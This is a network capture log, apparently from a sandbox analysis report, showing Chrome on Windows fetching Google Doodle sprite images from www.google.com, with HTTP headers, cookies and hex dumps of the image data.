2024-09-26 15:55:29 UTC	48	IN	Data Raw: 32 61 0d 0a 29 5d 7d 27 0a 32 32 3b 5b 22 38 59 50 31 5a 71 33 47 4c 35 69 4b 39 75 38 50 36 38 6d 6f 6d 51 30 22 2c 22 32 30 38 35 22 5d 0d 0a Data Ascii: 2a)]}'22;["8YP1Zq3GL5iK9u8P68momQ0","2085"]
2024-09-26 15:55:29 UTC	50	IN	Data Raw: 32 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 0d 0a Data Ascii: 2cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>
2024-09-26 15:55:29 UTC	22	IN	Data Raw: 31 30 0d 0a 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a Data Ascii: 10c;[9,null,"0"]0;
2024-09-26 15:55:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.16	49762	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	777	OUT	GET /logos/2024/popcorn/rc4/preload-sprite.png HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:30 UTC	691	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 27209 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:08 GMT Expires: Thu, 25 Sep 2025 19:16:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/png Age: 74361 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:30 UTC	699	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 c1 00 00 03 c0 08 03 00 00 00 01 eb 0c d3 00 00 02 fd 50 4c 54 45 47 70 4c 85 25 19 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 99 66 11 9c 60 17 9d 60 18 9c 60 19 9c 60 18 9c 60 19 9b 60 19 9b 61 17 9d 62 16 9c 60 18 9e 61 18 4f 2a 0b 37 1b 00 39 1c 00 39 1d 00 39 1c 00 55 2d 10 51 2c 0c 51 2f 0e 8b 26 1b 8b 26 1b 8b 26 1b 8b 26 1b 9c 61 18 9c 60 19 9c 60 18 9b 60 19 9c 63 19 39 1d 00 3a 1e 00 3a 1e 00 3a 1e 00 3a 1e 00 39 1d 00 2b 11 00 1a 04 00 15 01 00 22 09 00 33 19 04 3a 1e 00 3a 1d 00 4b 2b 0c 73 54 31 87 6d 37 a6 8b 46 ba 8f 4a 9a 7a 3d 7f 5a 29 5d 43 1c 3e 22 03 cb ac 5a fa df 79 ff f6 87 ff fc 8b ff e8 81 e9 ce 6d 3a 1d 00 ff ff 90 ff Data Ascii: PNGIHDRPLTEGpL%&&&&&&&&&&&f``````ab`aO*7999U-Q,Q/&&&&a```c9::::9+"3::K+sT1m7FJz=Z)]C>"Zym:
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: d3 7b f2 9b 3e aa 8b 64 ea af 5c ca b4 91 d4 c0 9d ff e3 75 ff f0 cb df cc a8 d6 9e 5f f3 be 62 cc 8c 4a f1 a3 3f ed 91 3c fe e8 bb b6 86 50 da a7 68 ff f0 c4 ae 61 2d ff e9 97 ef 96 3d c6 75 39 0d 09 04 3c 30 16 cb 7e 42 d6 a1 53 fd c9 66 fe dd 72 c1 6d 34 ce 98 4f fb a7 42 df ab 56 c7 75 36 bd 66 31 ab 56 28 a5 50 26 5e 1a bf 94 00 00 00 fc 74 52 4e 53 00 10 40 80 af 70 30 bf 9f 60 20 50 8f 0f 6f 7f af bf ff cf 4f 2f 9f 3f 1e 55 68 9b 8a 5f 3e 0e cf ff df ef 5f ef df 8f 1f 79 c4 f7 ff de ab ff ff ff ff ff e9 ce ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b9 ff ff ff ff ff ff 4d 2e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: {>d\u_bJ?<Pha-=u9<0~BSfrm4OBVu6f1V(P&^tRNS@p0` PoO/?Uh_>_yM.
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: b3 23 66 40 e2 53 21 55 a7 a9 a1 50 62 3c 12 4e aa 55 68 09 65 50 e4 b8 26 44 96 2e e6 9f a5 35 93 db 86 4a 18 00 c8 ef 81 19 3a be 2c e7 fc 00 97 42 21 d0 48 9c 76 5c ca c1 ef 8b d2 7f 15 a7 44 8d 30 f6 78 7d b8 16 ac bf e7 d1 26 22 09 f3 a1 f1 9b de 16 65 ec fb d4 d4 e4 70 2a 5c 6e 54 c9 30 90 34 72 46 da fd 7a 5f e4 86 90 d6 4c 2f d7 0b f3 1a 01 00 48 0c 30 fb d7 97 95 fc 3a 25 a8 b1 ad 73 3b 5c b4 81 cb e1 46 f7 03 5c b8 d8 d5 e9 f1 65 59 17 e5 ba 62 fc cf 70 0b e1 e7 bf 1b 40 3b 27 0e 2a 37 01 26 f4 43 14 83 82 20 f2 df 53 4a 38 51 31 c4 68 c9 b8 1c e4 5e 10 5a 06 b3 08 09 66 99 9c 42 18 00 80 db 57 9c 5f 8e 2f 2e ab b8 3e bc c2 85 58 27 7a 16 16 2f cd e2 22 2c 6d ed 41 e0 21 03 cc fe 79 d5 3f 8b a3 13 12 a6 24 79 59 5c cd e3 27 ac 56 2e 38 16 56 75 Data Ascii: #f@S!UPb<NUheP&D.5J:,B!Hv\D0x}&"ep\nT04rFz_L/H0:%s;\F\eYbp@;'7&C SJ8Q1h^ZfBW_/.>X'z/",mA!y?$yY\'V.8Vu
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 6d e4 61 bb a4 39 50 15 ec f1 ef 04 3c 43 fe 21 38 36 00 a6 e0 81 50 ce a0 df ef 81 ff d2 11 30 23 2f e0 89 00 2f dc 9a c1 04 0f 69 d8 60 74 b2 44 4e af cc bb d3 ee 00 3a b9 3c 02 f3 94 53 1a fd 2a 0f 91 af a0 a7 dd 77 0d 74 44 69 af 6d 25 e6 ed c9 92 70 7d 4f f9 f3 10 99 93 46 97 aa c5 bc 35 f9 40 ad 43 56 e3 37 52 95 23 d3 bb 16 2f bd 67 4d 64 a4 5d 3d 18 4c 84 8b d7 ec 5c 18 e6 b9 ee c9 30 4c f3 34 85 b1 6d 64 34 6a 30 d3 f6 52 8f c4 f7 1d 47 bd 20 14 1c 05 83 21 a4 c4 13 7b 7d d8 43 a7 9c fc 44 a7 52 68 90 6a 10 42 8b f2 f9 5d 51 ab f1 fb 64 1b 4c 60 d0 3f 45 e8 90 76 0d 46 27 2b 47 fc e3 6c f1 1d 95 4b d2 29 22 1e b5 e5 e5 0b da f0 97 be fa 02 d3 db d6 41 2f 6f d2 a3 30 f2 c4 16 8a 78 a1 3a 4a 12 7d aa 46 e7 b0 0b 69 4c 46 9c 48 a9 fc e3 ca 25 bf 33 Data Ascii: ma9P<C!86P0#//i`tDN:<S*wtDim%p}OF5@CV7R#/gMd]=L\0L4md4j0RG !{}CDRhjB]QdL`?EvF'+GlK)"A/o0x:J}FiLFH%3
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 47 8a ea 62 7c 6f 9a 53 06 2d 44 6b 5b 7f 57 a7 d4 46 aa f7 4c dd ef 6f 6d 9c 36 61 77 13 f3 c8 07 68 30 dc 6c 98 77 5e 87 d9 30 1b 9a b9 30 4c a3 6d 53 44 61 94 da 8e 34 27 83 65 8e 81 62 7e 06 8b 01 c9 60 99 1f 3d 80 cf 60 68 79 70 0d c7 61 e7 3f 96 8a e6 04 20 5e e3 49 9e 8f 72 25 91 92 e1 78 24 1a 0c 12 4c 62 30 73 32 04 30 00 c4 0f 7e 8e b8 ef 0e fa b6 75 f2 48 7f 71 50 ad 04 ed d4 f3 6b 61 ba da bf 73 2a f5 a9 7b 0a 51 4c 0f fd 90 3f fa a3 4b c6 40 53 f9 39 a4 5e 87 8c cf 26 4c 9e ee b5 53 bc 12 4e e4 8c bc 34 12 4d 41 45 2a 1a 91 1e 0a bf 29 71 18 00 84 e9 fa f9 83 77 d5 06 41 3e 64 cc 23 4d db 28 83 f9 08 0d 86 e3 e2 f8 a5 cb b1 a6 a4 b7 19 13 b3 e7 fe 86 e6 a8 c2 34 d9 f6 33 46 72 2c cc ac 8c 79 b3 81 4c e0 2e f6 a5 b9 99 65 a5 bc 94 65 4e 52 4a Data Ascii: Gb\|oS-Dk[WFLom6awh0lw^00LmSDa4'eb~`=`hypa? ^Ir%x$Lb0s20~uHqPkas{QL?K@S9^&LSN4MAE)qwA>d#M(43Fr,yL.eeNRJ
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 67 82 30 bd 79 d6 81 2d df 9a be 09 7d 39 31 c5 77 ea 38 0c 91 27 c0 56 24 25 82 30 fd bd 29 bc 4f 65 29 5f ac 89 8c cd c0 62 f0 a2 64 5e bb 37 4c 73 41 76 29 09 3f c5 0a 75 22 bd 86 b1 22 65 e8 10 36 18 88 c1 5c 97 18 83 41 4e 1d fb de d2 7d d4 16 35 98 26 d6 60 40 60 d2 8c c0 b6 46 c0 03 b6 10 12 b5 d9 d1 8e 7f a6 37 3b a2 0a b9 93 56 d8 a0 94 dc 66 06 a3 2b 4c 36 de b9 c8 e7 ac 37 cf ca fb 45 54 ac 5e a0 1b fd a5 5d 54 26 20 d7 a0 51 be 9e 00 7e 58 99 fa 1b 55 5e 7e 52 c2 24 4f 39 15 57 98 22 45 46 ad bd 22 3e 46 24 7b ea 5d 85 be 1b ed 85 30 cd 0d 85 26 c2 28 96 b7 2b a1 67 4b bf f9 a2 6a 06 03 31 18 4c 23 49 36 98 63 8f 3d 62 32 ef 8b d6 c1 6c 6b 8c 65 91 16 d0 43 e9 66 53 dc 05 03 d1 80 cc b9 ec 01 0b 33 59 ca 4a 81 f2 e8 7b 70 de b9 09 27 fa 03 9f Data Ascii: g0y-}91w8'V$%0)Oe)_bd^7LsAv)?u""e6\AN}5&`@`F7;Vf+L67ET^]T& Q~XU^~R$O9W"EF">F${]0&(+gKj1L#I6c=b2lkeCfS3YJ{p'
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 44 bc 65 8a b3 61 0a 14 5b f9 38 6a 95 a9 85 a9 c2 a4 97 f2 43 3f 88 76 bb 2c 65 f3 87 6c f8 4d 2b 0a 93 2b 14 99 83 7e bf b3 9f bd f5 94 dc 16 35 f1 bb 40 f3 14 31 18 e5 15 a6 4f c2 00 89 15 75 e6 f7 3f bd ce 2a cc d6 b8 28 4c d3 b6 3d dd 82 06 73 ed f8 f1 93 8c b5 fb c9 e6 e8 66 ea 08 b6 df 18 e3 da 84 65 02 65 69 d9 89 93 49 1b 0c da 03 0d e4 96 86 45 1e 8a 25 36 14 6e 6a 4c 2f 40 5a d4 30 cf 01 84 c1 a0 5a d1 06 63 48 07 19 a0 b3 33 60 71 80 60 fd 83 fc 20 4c a1 aa 21 98 de 7e 89 9f b0 d2 a0 31 56 4c 44 69 fb 1f 7b e7 01 dc d4 95 f5 71 63 fa d2 7b c7 b0 c1 36 45 41 4f 52 e0 a3 8a 62 62 0b 03 26 a1 13 b0 48 42 07 9b e0 40 6c 8a 33 64 36 9d b8 d0 3e 87 f6 15 47 1e 65 26 16 43 76 04 86 60 c7 8c 3d 44 72 64 08 29 74 a7 89 65 c9 12 a7 b7 2d d3 f6 4a 3a 2a Data Ascii: Dea[8jC?v,elM++~5@1Ou?(L=sfeeiIE%6njL/@Z0ZcH3`q` L!~1VLDi{qc{6EAORbb&HB@l3d6>Ge&Cv`=Drd)te-J:
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 8d fe ae dd 61 75 29 18 9b 5b c1 cc 1e 2f 53 83 81 10 d2 0e 8d 4e a3 9f 9e 9e 05 63 ec 16 3e a2 d5 a8 f5 63 46 25 00 c3 7d 70 0f 22 89 f6 62 af ca 96 e5 85 e7 9f f3 9d f3 9f 87 46 8f fc 63 5f f3 36 79 f6 c0 43 65 79 d6 17 b9 fe d3 5e 18 dd 22 8b f1 65 5f 94 fb a5 e7 5e 7c 56 46 e8 bc 8a f3 0a fe 72 af ca de 0d 3c 19 75 05 d3 9a 83 82 49 ba 2a 9e b9 ca 77 09 22 b0 1e f4 0b 46 39 b9 e5 6d 0b 3f 05 83 e9 b1 a7 c9 be 76 30 52 bb 44 5f c0 d4 81 80 91 c0 5e 86 f8 ea 9a ff 80 49 a2 17 97 cd 09 f1 77 36 99 0f 12 88 5a e2 2a 4c 0f 62 41 96 43 9e 98 e5 df 46 c2 d7 48 4c 5e eb f4 91 71 5b 0a b0 c6 5c 4f 60 48 5f c9 91 0a c0 56 de ac 8f 30 4f dd a5 77 77 fc d3 d0 9d 08 b0 9e 60 66 4d d2 68 bd 56 db b8 de 9d aa 76 40 0d 46 d0 ff 6d 9f 9c 87 f7 bf 1b d1 18 98 a9 d3 21 Data Ascii: au)[/SNc>cF%}p"bFc_6yCey^"e_^\|VFr<uIw"F9m?v0RD_^Iw6ZLbACFHL^q[\O`H_V0Oww`fMhVv@Fm!
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: c6 85 a8 a9 d4 ab 4b 14 62 48 17 ca 8a 14 48 18 63 19 de 47 fa 84 78 0a 20 f0 1e 7b ab 03 bb f9 60 40 17 d0 2f d8 a1 20 c2 42 bf 2e 90 42 27 87 34 d9 29 c3 77 12 7d 24 b6 b6 ff 54 ac bd 18 75 05 f3 14 e9 3c 98 de fc 04 0c 68 98 b0 cc bc 03 55 05 77 ed ae 1a 4c a6 47 c1 68 84 6b a5 c1 53 60 ae 09 05 6a f0 f0 62 cc 99 af d3 0d 8a 19 05 03 3c 30 1c 1b 09 73 bf 62 7c 72 b8 9f 8e 31 d0 d4 63 b2 f8 06 28 be d3 0c 60 12 86 dd f5 55 2a 2e 60 42 7d a5 9b c9 ae 61 39 6e 15 e8 d2 57 ee c2 bb 81 fc 1b 08 9a d9 bc b8 ea 17 30 65 f6 1b d2 34 d9 4a 4b 8c a0 60 ac 65 40 1d 69 a0 ba 2b 7e 18 10 04 ce 98 b1 85 28 15 36 32 a8 5f 70 80 9f 82 81 d0 37 21 57 bc 3d a4 b5 4e 39 d2 c4 9d a4 77 99 2e 78 c4 66 04 45 5f c1 6c 27 fc b7 b2 b7 c4 ee 94 63 9c 9a 5d a9 8a 14 8c d6 a5 60 Data Ascii: KbHHcGx {`@/ B.B'4)w}$Tu<hUwLGhkS`jb<0sb\|r1c(`U*.`B}a9nW0e4JK`e@i+~(62_p7!W=N9w.xfE_l'c]`
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 7b 9c 4e f7 bc cd d5 46 ca f0 14 61 a6 8f 17 0a 74 85 e7 cf 14 8e 17 b4 ea 5c fd fc f4 0c 69 01 93 61 b3 1f d6 a8 06 c7 96 82 01 da 79 bd 30 71 86 b5 8a 6d 05 43 3e 78 f5 f8 ad 7a 59 05 03 14 37 02 f3 d8 8d b3 3b c9 6a 4a 78 f0 78 5b fa 95 0c 38 6f 61 e4 6d 17 77 0e 1a 22 ed 62 74 e5 37 0c 66 67 19 09 6f 42 aa 96 d8 0c 95 43 3e b8 96 4b df 60 64 98 5b 32 8e 05 c6 4d 2c e6 7c c0 6c 62 57 29 ea 17 69 03 b1 ce 89 31 75 f5 ea 1f 5f 9f ef 94 e4 9b b7 dd 7c 83 6e 16 42 9d 96 a9 59 ee 80 74 9a 8b 17 9b d6 e1 5f 25 44 fd f2 93 64 36 28 f6 47 c5 60 95 80 46 da 21 66 bb 8b 30 59 33 67 a9 34 6a 01 51 a0 d6 e8 26 4c 47 16 5e 83 b4 80 a9 70 14 82 0d 26 86 14 0c d0 ca 97 a9 8e 0b 98 d8 57 30 64 a1 d9 5b f5 f5 7b 9b 81 50 55 98 2b 0c 62 92 78 cf e5 a0 89 99 82 01 92 47 Data Ascii: {NFat\iay0qmC>xzY7;jJxx[8oamw"bt7fgoBC>K`d[2M,\|lbW)i1u_\|nBYt_%Dd6(G`F!f0Y3g4jQ&LG^p&W0d[{PU+bxG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.16	49767	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	1437	OUT	GET /logos/2024/popcorn/rc4/preload-bg-sprite.jpg HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.google.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:30 UTC	692	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="doodle-eng" Report-To: {"group":"doodle-eng","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/doodle-eng"}]} Content-Length: 44346 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 25 Sep 2024 19:16:08 GMT Expires: Thu, 25 Sep 2025 19:16:08 GMT Cache-Control: public, max-age=31536000 Last-Modified: Wed, 25 Sep 2024 18:30:00 GMT Content-Type: image/jpeg Age: 74361 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:30 UTC	698	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 03 c0 02 1c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 05 06 03 04 07 ff c4 00 41 10 00 01 03 02 04 04 04 03 05 07 04 02 03 01 00 03 01 00 02 11 12 21 03 22 31 41 04 05 32 51 42 61 71 81 06 91 b1 13 14 52 a1 c1 15 23 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"A!"1A2QBaqR#
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 11 aa 62 c7 96 67 c8 73 49 ab cd 27 42 8a f2 bb 69 dd 2c 37 75 1d 3a 26 19 8e 80 d4 d8 3e c9 b5 8c ba 7c d7 29 cb d2 9e 43 5b 3b 9d d0 19 ce 79 fe e4 05 37 0c 12 4a ac 37 d1 59 73 f9 fd a4 23 76 05 54 4d 4e 24 ea 91 b9 b4 b7 f1 fa a9 38 06 ab a4 f3 37 94 dd 48 33 4d 94 57 81 2d 77 4a f5 f2 bc 3a f9 96 08 fe f5 e4 27 a6 76 d5 7a f9 53 e3 9a e0 65 de cb b4 ed 0a ef 75 cf a6 c6 ec 64 54 95 e4 51 fa 28 ae 87 67 d4 a8 7c 16 df 43 a1 4f bc e8 61 2e 6f 90 43 cb 43 ab d5 24 d0 d6 c5 e6 ca 08 86 46 a8 02 b9 77 70 a9 fe 21 78 3c 2e 08 aa 0d 76 1e ca d5 8f f0 1b 05 47 f1 19 14 f0 c2 9d 26 4f c9 57 77 49 33 89 1f ba 14 4f 34 e4 a9 06 1e df 30 a6 61 bd d4 19 35 65 84 9b 74 e6 cd b6 a7 64 93 0c ba 63 e4 90 01 4d d0 1a 1e 40 01 e1 f1 9f 4e a4 0f 92 b7 90 1c d3 4b a3 f3 Data Ascii: bgsI'Bi,7u:&>\|)C[;y7J7Ys#vTMN$87H3MW-wJ:'vzSeudTQ(g\|COa.oCC$Fwp!x<.vG&OWwI3O40a5etdcM@NK
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 71 3b ea a6 0b bc ca 89 cc 98 3f 2b 86 85 49 12 c5 2b c3 ce 4b 5d cb 1d dc 11 4f ac ab 19 ee d5 5b ce 63 f6 6b cf 72 3e aa 15 eb 2b 6c 76 53 ed 9b f5 4d 68 4b 35 3a 0e 8a 48 d7 2d c2 4d bc 91 28 23 34 a8 3d 22 35 0a 64 e8 3e 48 48 b7 aa 46 bd 96 d7 87 79 6f 0f 86 69 87 50 24 1d 96 2b c8 ad af 0c 03 78 5c 39 b8 a0 68 ae b1 cc b3 7e 43 8a 5d a6 6e a2 77 2d 84 4d 2d 92 a0 1a 9b 74 cb 2c c0 8a a0 20 4b 9d d8 15 2c a4 f8 5c 9f c8 e8 34 5d 0c d7 3d c9 cc bf f0 10 ab 60 bb d5 58 f3 c1 fc c9 d1 71 40 55 80 9d d2 37 36 97 a0 c7 ea a7 d2 4c 8d 11 03 dd 49 1f fb 4a 5f 4b 94 57 03 02 f5 6a bd bc 9f fd cf 0b df e8 ab fc 5d d7 bf 93 32 be 65 84 6a d2 49 f9 29 5b da 15 5f eb ab d3 58 21 be 8b 93 de 75 d7 c9 16 aa 36 d6 ea 3c 52 9e 79 e2 97 93 d0 db f9 22 cf eb d9 44 cb Data Ascii: q;?+I+K]O[ckr>+lvSMhK5:H-M(#4="5d>HHFyoiP$+x\9h~C]nw-M-t, K,\4]=`Xq@U76LIJ_KWj]2ejI)[_X!u6<Ry"D
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: bd 3e 48 1e 77 1d 93 1e 94 7e 1d d0 1e 4e 62 03 b9 6f 10 47 6f d5 66 16 9f 99 b0 fe cc c6 97 6d 3f 9a cd 0e db 25 af 72 d4 c2 d3 fe 94 5e a4 14 d0 a4 65 91 b2 a8 e2 3f 25 2c ea 44 6d aa 91 fe 50 7b ae 86 bf 01 81 b8 58 63 68 11 1e 8b ac 7f 76 ab 9e 14 d0 cc d2 00 0b ac 0b 27 58 35 6d 20 76 d9 31 3f 3e e9 20 17 75 26 80 d6 c2 11 48 2b c3 ce 01 77 2d 7c d5 62 0c fb ee bd cb c7 cd 58 5f cb 71 33 74 c3 87 b1 51 af 59 5b 67 b2 9f 6c b5 aa 82 88 dd 37 53 91 39 52 6d e1 1b a2 3e 48 01 4c 20 06 76 0d 9d 96 db 86 61 6e 0b 03 f5 00 05 8c b3 56 cb 82 c5 2e e1 30 5f b1 10 ae b1 cc b3 fe 42 3f 10 ea 05 29 80 0d 63 8e aa 07 72 a4 67 4c b2 c0 32 d8 3f 20 8f 0a 61 d3 6d 52 c1 fc 4b a1 9a e7 b2 39 87 fe 02 15 59 3b 15 6b f1 06 1b 47 1e c2 35 2c cc 3d 15 3c d4 d8 0d 84 8d Data Ascii: >Hw~NboGofm?%r^e?%,DmP{Xchv'X5m v1?> u&H+w-\|bX_q3tQY[gl7S9Rm>HL vanV.0_B?)crgL2? amRK9Y;kG5,=<
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: c6 30 fe d0 c6 cd 79 d5 70 fc 4b db cc d8 1b cc 31 7d 88 f9 2f 2d 07 28 4a 55 cc b6 ad 4f dd 10 e7 13 ea a6 06 fa 95 d2 23 d7 65 10 3a f7 5c 58 56 06 97 34 1b 09 ba d7 c0 a6 db 0b 7a 2c 95 b6 d1 6b 70 c9 38 4c 34 c1 20 7d 15 d6 7c 91 cd f0 80 2a 6a 23 35 d3 41 d1 34 65 f3 2a e6 79 6f 4b 8e 54 a0 66 ee 9a 0e c9 ad 4b a7 d9 01 e1 e6 77 e5 f8 db 5b f5 59 ab b7 dd 6a 39 8c 37 97 e3 4b 6d 1b 7a ac d9 19 9b d9 2f 77 98 69 e1 69 24 02 13 4f 65 20 0a 90 dd d5 26 c8 99 9e 4d f9 a9 4a 3a 9b 2d f6 5d 4a 5a fc 38 76 13 27 58 09 e3 32 56 01 f6 4c f3 00 ae 80 ee 13 ac 0a b9 10 1d 1e 6a 40 cb 6f 74 be 54 d9 74 fc 89 5d 70 01 2e 71 d0 6e bc fc c7 0b f9 7f 11 da 85 e9 8a 5d 75 c7 8c 05 dc 17 10 05 f2 1b 7b 2e 4f 12 95 b9 fa ae 25 8f ff 00 c9 37 87 a5 4c 6f dd 10 1d e6 92 Data Ascii: 0ypK1}/-(JUO#e:\XV4z,kp8L4 }\|j#5A4eyoKTfKw[Yj97Kmz/wii$Oe &MJ:-]JZ8v'X2VLj@otTt]p.qn]u{.O%7Lo
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 5a db aa 62 ae b9 04 7e f8 1b c4 29 5a da 0b 65 f5 4a e0 83 a8 52 c0 43 6c 9e 25 d6 ec a4 01 4b 42 71 8e 86 31 38 02 14 c5 3e 88 be da 21 14 c0 33 f5 4c 19 4d 23 30 4f 97 fe d1 10 d4 01 77 78 a3 cd 11 56 89 91 6f c2 ba 14 3c dc 3b ef ae cd 22 04 47 65 e1 8c be 65 7b 39 99 a7 98 3f db e8 bc b7 4a 55 cc b5 ec e9 05 67 54 14 11 99 3c 13 a2 88 ca a2 b4 bf a2 d3 f0 e0 0e 1d 80 35 da 68 56 68 e5 5a 2e 08 39 bc 26 1d 75 13 1b f6 57 5a e6 49 e6 6b 0f 41 ee 88 52 a1 5c cf 4c 65 40 e9 84 7a a2 10 1e 3e 66 07 ec fc 50 6d a7 ce 56 77 a9 69 79 9f fb 76 37 a7 ea b3 57 54 5d e5 a5 87 a4 fb 11 b2 04 21 4c 2a 8d a0 8e c8 64 d4 df 51 64 4a 91 d4 d3 56 e1 0e cb 58 3a 19 e8 9d 80 55 7b 21 99 9a d2 88 ef ba 71 85 20 e6 4c 32 d3 9b dd 40 b3 5d f9 a6 1d 3e 4b a8 a0 c5 20 2e 3c Data Ascii: Zb~)ZeJRCl%KBq18>!3LM#0OwxVo<;"Gee{9?JUgT<5hVhZ.9&uWZIkAR\Le@z>fPmVwiyv7WT]!L*dQdJVX:U{!q L2@]>K .<
